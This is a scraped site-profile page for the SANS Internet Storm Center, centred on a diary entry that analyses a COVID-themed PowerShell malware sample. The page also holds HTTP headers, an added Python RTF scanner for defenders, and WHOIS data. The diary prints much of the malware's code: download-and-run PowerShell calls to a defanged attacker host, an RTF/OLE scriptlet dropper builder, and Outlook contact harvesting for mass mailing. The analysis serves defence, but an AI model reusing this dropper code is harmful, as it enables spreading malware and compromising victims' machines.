Isc.sans.org is a subdomain of Sans.org, which was created on 1995-08-04, 29 years ago.
Description: SANS Internet Storm Center. Today's Top Story: Weaponized RTF Document Generator & Mailer in...
HomePage size: 42.176 KB
Page Load Time: 0.207078 Seconds
Website IP Address: 204.51.94.153
SANS Internet Storm Center: isc.sans.edu
Internet Storm Center: https://isc.sans.org/
Date: Sat, 18 Apr 2020 01:45:00 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-HeyJason: DEV522 rocks
Permitted-Cross-Domain-Policies: none
Expect-CT: max-age=0, report-uri="https://isc.sans.edu/cspreport.html"
X-Do-Not-Hack: 18 U.S.C. Parag 1030
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31556926; includeSubdomains; preload
Referrer-Policy: same-origin
Content-Security-Policy: "default-src self; script-src self unsafe-inline unsafe-eval ; style-src self unsafe-inline; img-src self https://isc.sans.edu data:; font-src self https://fonts.gstatic.com data:; connect-src none; media-src self; object-src none; child-src self https://www.sans.org; frame-src self https://www.sans.org https://www.youtube.com; worker-src none; frame-ancestors https://www.sans.org; form-action self; upgrade-insecure-requests; block-all-mixed-content; disown-opener; reflected-xss block; manifest-src none; referrer origin-when-cross-origin; report-uri https://isc.sans.edu/cspreport.html;"
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=0, public
Expires: Sat, 18 Apr 2020 01:45:00 GMT
Keep-Alive: timeout=30, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: nlbi_2188750=AImIaOOH/xwl28UIDW1UNgAAAAA18LuF5BmwKLSO5OGwvIez; path=/; Domain=.sans.edu; Secure; SameSite=None, visid_incap_2188750=Da2VYzPmSdK9Uwr809jTlZxbml4AAAAAQUIPAAAAAAA2IDhTaVPrU43qBINBdahc; expires=Sat, 17 Apr 2021 10:33:52 GMT; HttpOnly; path=/; Domain=.sans.edu; Secure; SameSite=None, incap_ses_1162_2188750=BiKeTDl0tn7JB+o6/UAgEJxbml4AAAAACVwha/dLj8luhV0LKGOUAQ==; path=/; Domain=.sans.edu; Secure; SameSite=None, ___utmvmNFBuREXZZ=pMzIBDilxKj; path=/; Max-Age=900; Secure; SameSite=None, ___utmvaNFBuREXZZ=SwK\x01DODc; path=/; Max-Age=900; Secure; SameSite=None, ___utmvbNFBuREXZZ=RZt\r\n XacOAalj: ytU; path=/; Max-Age=900; Secure; SameSite=None
X-CDN: Incapsula
Transfer-Encoding: chunked
X-Iinfo: 6-18129345-18042012 pNNN RT(1587174300199 15) q(0 0 0 0) r(1 1) U12

Note on the Content-Security-Policy value as captured: the source keywords self, unsafe-inline, unsafe-eval and none appear without the single quotes the CSP grammar requires (unquoted, a browser parses them as host names, so the policy would not behave as intended), script-src permitting unsafe-inline and unsafe-eval gives little protection against injected script in any case, and reflected-xss, referrer and disown-opener are draft-era directives that current browsers ignore. Whether the missing quotes are in the served header or an artifact of this capture cannot be determined from this page.
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<meta charset="utf-8"/>
<meta content="" name="viewport" width="device-width, initial-scale=1.0"/>
<meta content="SANS Internet Storm Center" property="og:site_name"/>
<meta content="en_US" property="og:locale"/>
<meta content="website" property="og:type"/>
<meta content="https://isc.sans.edu/index_dyn.html" property="og:url"/>
<meta content="@sans_isc" property="twitter:site"/>
<meta content="@sans_isc" property="twitter:creator"/>
<meta content="summary_large_image" property="twitter:card"/>
<meta content="https://isc.sans.edu/images/logos/isc/large.png" property="twitter:image"/>
<meta content="SANS Internet Storm Center" property="twitter:image:alt"/>
<meta content="https://isc.sans.edu/images/logos/isc/large.png" property="og:image"/>
<meta content="SANS Internet Storm Center. Today's Top Story: Weaponized RTF Document Generator & Mailer in PowerShell;" name="description"/>
<meta content="SANS Internet Storm Center. Today's Top Story: Weaponized RTF Document Generator & Mailer in PowerShell;" property="og:description"/>
<meta content="SANS Internet Storm Center" name="AUTHOR"/>
<meta content="isc, sans, internet, security, threat, worm, virus, phishing, hacking, vulnerability" name="KEYWORDS"/>
<meta content="width=device-width, initial-scale=1" name="viewport"/>
Ip Country: United States
Latitude: 37.751
Longitude: -97.822
Threat Level: green
Handler on Duty: Guy Bruneau
Last Daily Podcast (Fri, Apr 17th): Applocker vs LOTL; Netlink GPON 0Day; Windows Security Crash; Bad Gems; vCenter Exploit

Latest Diaries

Weaponized RTF Document Generator & Mailer in PowerShell
Published: 2020-04-17. Last Updated: 2020-04-17 10:35:19 UTC by Xavier Mertens (Version: 1). 0 comment(s)

Another piece of malicious PowerShell script that I found while hunting. Like many malicious activities that occur these days, it is related to the COVID19 pandemic. Its purpose is simple: it checks if Outlook is used by the victim and, if it is the case, it generates a malicious RTF document that is spread to all contacts extracted from Outlook. Let's have a look at it.

The script is available on VT (SHA256: 1f7f0d75fe5dace66ec9b5935d28ba02765527f09f58345c2e33e17ab4c91bd7) and has a low score of 8/60 [1]. First, it performs malicious activity only if Outlook is available on the victim's computer:

    if((get-childitem C:\Users\$env:username\AppData\Local\Microsoft\Outlook).count -gt 1) { ... }

If the test is successful, a malicious RTF document is generated and dumped on disk ('urgent.doc'). Here is the beautified code. Most of the code was compressed and Base64-encoded.

    $gdoc_cmd='cmd /c powershell IEx(New-Object Net.WebClient)."DownLoadString"(''hxxp://t[.]awcna[.]com/mail.jsp?%username%*%computername%'')'
    $dde_cmd='powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''hxxp://t[.]awcna[.]com/mail.jsp?dde*%username%*%computername%'')&'
    $att=$env:tmp+"\urgent.doc"
    $gdoc_title='PROTECTED DOCUMENT'
    $gdoc_text='This file is protected by Microsoft Office.Please enable Editing and Content to see this document.'
    function str2hex($str) { -join([Text.Encoding]::UTF8.getbytes($str)|foreach{$_.ToString('x2')}) }
    function u162hex($str){ -join([Text.Encoding]::Unicode.getbytes($str)|foreach{$_.ToString('x2')}) }
    function int2hex($num){ [bitconverter]::ToString([BitConverter]::getBytes([int32]$num)).replace("-","").tolower() }
    $cmd=$gdoc_cmd.replace("'","\'")
    $filename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count 15)+".sct"
    $filename="7UFNDWH1X5OPDY1.sct"
    $fakepath="C:\fakepath\$filename"
    $data=@"
    ?XML version="1.0"? scriptlet registration description="fjzmpcjvqp" prog version="1.00" class remotable="true" /registration script language="JScript" ![CDATA[ new ActiveXObject("WScript.Shell").Run('$cmd',0,1);window.close(); ]] /script /scriptlet
    "@.trim()-replace"r",""
    $package_data="0200"+(str2hex $filename)+"00"+(str2hex $fakepath)+"0000000300"+(int2hex ($fakepath.length+1))+ \
    (str2hex $fakepath)+"00"+(int2hex $data.length)+(str2hex $data)+(int2hex $fakepath.length)+ \
    (u162hex $fakepath)+(int2hex $filename.length)+(u162hex $filename)+(int2hex $fakepath.length)+(u162hex $fakepath)
    $header_data="0105000002000000080000005061636b616765000000000000000000"+(int2hex ($package_data.length/2))
    $package="{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "+$header_data+$package_data+"0105000000000000}}"
    $rtf=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream.(,$([Convert]::FromBase64String('
    7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGA \
    qsgfP358Hz8ifvEv/n3r9hfv/BL6WU1+Op+2+JGt27JYvsWv69Usa3P69lv4a1pmTZN+t6pn46fVdL3Il+344Jf8EvM1Nc3Snd2d+zt49nbkeSg/9p/tn+zf \
    v7e3f/Lpw09PP32i34bPMf55unPybHf3dOd498nu7vHpbrSl99w7xT87O89Onz3j3j4daGgg9SDqBwZj/RPw8HRbP/vR86Pn/yfP/yuH8VR/qvz1fv7o+dHz \
    o+cbef7fCOQ+2eFPn8n/H+yLWd4nn+LTU/n7AX3wQL2Kn41nF/7D/b6dt/4BexvuOQne3h/yPnYe7Ow//fTk+NN7D57cf7pHXoaD4iDj2YW3ROMlwJ/edx// \
    0B54YXvDfs6N77/ns9v1yO7p+MEHhMv+Q5n7Tz8VnvjZfnYxG5gfg5XO0zc+/n392eUYjB9zb8b95GePBl2U8OwCrx/G/CtvP3nQ+dzQ3UiFoX/HD7B00/d/ \
    5B/86PnR837P/xtbq/zvmcxBP14PH2t/H95gl50+udF+7x7LX3v37+/vP72Pnye/ePeX0CekkI+fPj2Vr29+7h3oT0+Z7ZHiu09Kdv+p6ED+m7D4xXu/5OTT \
    42fHT05Pdh8+ePZ0b5d+HHBXzw4e3H9wuqdY3f6xNP2UqON5GUM+i23feR6S9f10x/Nd3vPZxXyC6k9vbPqj54f4/NC6MllBfX4JP79x8v8A')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() -f $package,(str2hex $filename),(u162hex $filename)
    $rtf_header=" \
    {\rtf1\adeflang1025\ansi\ansicpg936\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang103 \
    3\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 020206030 \
    50405020304}Times New Roman;}
    {\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}\'cb\'ce\'cc\'e5{\*\falt SimSun};}{\f34\fbidi \froman\ \
    fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
    ...
    \fs21\lang1033\langfe2052\kerning2\loch\af31506\hich\af31506\dbch\af31505\cgrid\langnp1033\langfenp2052 {\rtlch\fcs1 \af3 \
    1507\afs60 \ltrch\fcs0 \b\fs60\insrsid338069 \hich\af31506\dbch\af31505\loch\f31506 AAAAAAAA}{\rtlch\fcs1 \af31507\afs60 \
    \ltrch\fcs0 \b\fs60\insrsid859070\charrsid859070\par }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1024\langfe1024\noproof\insr \
    sid338069 {\shp{\*\shpinst\shpleft397\shptop564\shpright8667\shpbottom4384\shpfhdr0\shpbxcolumn\shpbxignore\shpbypara\shp \
    byignore\shpwr3\shpwrk0\shpfblwtxt0\shpz0\shplid1026
    ...
    \hich\af31506\dbch\af31505\loch\f31506 BBBBBBBB}{\rtlch\fcs1 \af31507\afs28 \ltrch\fcs0 \fs28\cf6\insrsid859070
    ...
    \af31507\afs28 \ltrch\fcs0 \fs28\cf6\insrsid7149827\charrsid7149827 \hich\af31506\dbch\af31505\loch\f31506 C:\\\\Programs \
    \\\\Microsoft\\\\Office}{\rtlch\fcs1 \af31507\afs28 \ltrch\fcs0 \fs28\cf6\insrsid7149827 \\\\\hich\af31506\dbch\af31505\l \
    och\f31506 12}{\rtlch\fcs1 \af31507\afs28 \ltrch\fcs0 \fs28\cf6\insrsid7149827\charrsid7149827 \\\\\hich\af31506\dbch\af3 \
    1505\loch\f31506 MSWord\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\system32\\\\cmd.exe /c}{\rtlch\fcs1 \af31507\afs28 \l \
    trch\fcs0\fs28\cf6\insrsid7149827 \hich\af31506\dbch\af31505\loch\f31506 calc.exe" }{\rtlch\fcs1 \af31507\afs28 \ltrch\f \
    cs0 \fs28\cf6\insrsid748411 \hich\af31506\dbch\af31505\loch\f31506 "Microsoft Office Remote \hich\af31506\dbch\af31505\lo \
    ch\f31506 Database" }
    ...
    \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority31 \lsdlocked0 Subtle Reference;\lsdsemihidden0 \lsdunhideused0 \
    \lsdqformat1 \lsdpriority32 \lsdlocked0 Intense Reference;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority33 \ls \
    dlocked0 Book Title;\lsdpriority37 \lsdlocked0 Bibliography;\lsdqformat1 \lsdpriority39 \lsdlocked0 TOC Heading;}}"
    .replace("AAAAAAAA",$gdoc_title).replace("BBBBBBBB",$gdoc_text).replace("calc.exe",$dde_cmd)
    ($rtf_header+$rtf.substring(3))|out-file -encoding ascii $att

The code is much longer but I kept only the relevant part, where the attacker replaces 'AAAAAAAA' with the document title, 'BBBBBBBB' with some juicy text and finally the 'calc.exe' command with his own malicious recipe (a PowerShell script). The generated document (SHA256: 88917f08fd169a257de0a015e83dcc11a41f5a87138d66a79e98b078bf804939) has a VT score of 31/59 [2] and here is how it looks when opened:

Once the document is generated, it is sent to all contacts found in Outlook:

    $global:contacts=@()
    $curr_date=Get-Date -Format "yyyy-MM-dd"

    # Extract email addresses
    function get_contacts($ol_folders) {
        $folders=$ol_folders.folders
        if($folders.count -ge 1){
            foreach($folder in $folders) {
                get_contacts($folder)
            }
        }
        foreach($item in $ol_folders.items) {
            $global:contacts+=$item.Email1Address
        }
    }

    # Cover our tracks and delete sent emails
    function...
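As an added example for defenders (written for this page, not code from the diary or from SANS ISC), the following Python scanner applies the object layout the script above builds: it pulls the hex `\objdata` blob out of an RTF, parses the OLE 1.0 `Package` header and the Ole10Native record to recover the embedded file's label and payload, and flags scriptlet drops and DDE-style command strings in the document text. `build_sample_rtf` constructs an inert test document with the same layout; all function names are assumptions.

```python
import re
import struct

# Indicators from the diary: an OLE "Package" object carrying a scriptlet (.sct)
# and a DDE-style command line planted in the document text.
SUSPECT_EXT = (".sct", ".js", ".vbs", ".hta", ".exe", ".ps1")
DDE_MARKERS = ("cmd.exe /c", "powershell", "ddeauto")

def parse_ole1_package(blob):
    """Return (label, payload) for an OLE 1.0 embedded 'Package' object, else None."""
    fmt, clslen = struct.unpack_from("<II", blob, 4)  # offset 0 holds OLEVersion
    if fmt != 2 or blob[12:12 + clslen].rstrip(b"\0") != b"Package":
        return None
    pos = 12 + clslen + 8  # skip the two reserved dwords before NativeDataSize
    native = blob[pos + 4:pos + 4 + struct.unpack_from("<I", blob, pos)[0]]
    # Ole10Native, as laid out in the diary's $package_data: flags(2) label\0
    # origpath\0 unknown(4) tmplen(4) tmppath datalen(4) data, then UTF-16 copies.
    label_end = native.index(b"\0", 2)
    label = native[2:label_end].decode("latin-1")
    p = native.index(b"\0", label_end + 1) + 1 + 4
    p += 4 + struct.unpack_from("<I", native, p)[0]
    dlen = struct.unpack_from("<I", native, p)[0]
    return label, native[p + 4:p + 4 + dlen]

def scan_rtf(rtf):
    """Return a list of findings for one RTF document given as a str."""
    findings = []
    for m in re.finditer(r"\\\*\\objdata\s*([0-9a-fA-F\s]+)", rtf):
        try:
            label, payload = parse_ole1_package(bytes.fromhex(re.sub(r"\s", "", m.group(1))))
        except (TypeError, ValueError, struct.error):
            continue  # not a Package object, or truncated / non-hex object data
        if label.lower().endswith(SUSPECT_EXT):
            findings.append("package object drops " + label)
        if b"<scriptlet" in payload.lower() or b"wscript.shell" in payload.lower():
            findings.append("package payload is a scriptlet")
    low = rtf.lower()
    findings += ["dde-style command: " + mk for mk in DDE_MARKERS if mk in low]
    return findings

def build_sample_rtf(label, payload, text=""):
    """Constructed test document using the object layout the diary shows (inert)."""
    path, i32 = "C:\\fakepath\\" + label, lambda n: struct.pack("<I", n)
    u16 = lambda s: s.encode("utf-16-le")
    native = (b"\x02\x00" + label.encode() + b"\0" + path.encode() + b"\0\x00\x00\x03\x00"
              + i32(len(path) + 1) + path.encode() + b"\0" + i32(len(payload)) + payload
              + i32(len(path)) + u16(path) + i32(len(label)) + u16(label) + i32(len(path)) + u16(path))
    hdr = b"\x01\x05\x00\x00\x02\x00\x00\x00\x08\x00\x00\x00Package\0" + bytes(8) + i32(len(native))
    return ("{\\rtf1 " + text + " {\\object\\objemb{\\*\\objclass Package}{\\*\\objdata "
            + (hdr + native).hex() + "0105000000000000}}}")
```

Run `scan_rtf` over the raw bytes of a suspect .doc/.rtf decoded as latin-1; an empty list means none of the diary's indicators were present, not that the file is clean.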
Domain Name: sans.org
Registry Domain ID: 9fe3e142e4ec482e8fbf4dc13650e53a-LROR
Registrar WHOIS Server: http://whois.domainpeople.com
Registrar URL: http://www.domainpeople.com
Updated Date: 2022-12-07T15:29:04Z
Creation Date: 1995-08-04T04:00:00Z
Registry Expiry Date: 2027-08-03T04:00:00Z
Registrar: DomainPeople, Inc.
Registrar IANA ID: 65
Registrar Abuse Contact Email: abuse@hostway.com
Registrar Abuse Contact Phone: +1.8664678929
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Data Protected
Registrant State/Province: MD
Registrant Country: US
Name Server: ns-1270.awsdns-30.org
Name Server: ns-1746.awsdns-26.co.uk
Name Server: ns-282.awsdns-35.com
Name Server: ns-749.awsdns-29.net
DNSSEC: unsigned
>>> Last update of WHOIS database: 2024-05-17T19:36:28Z <<<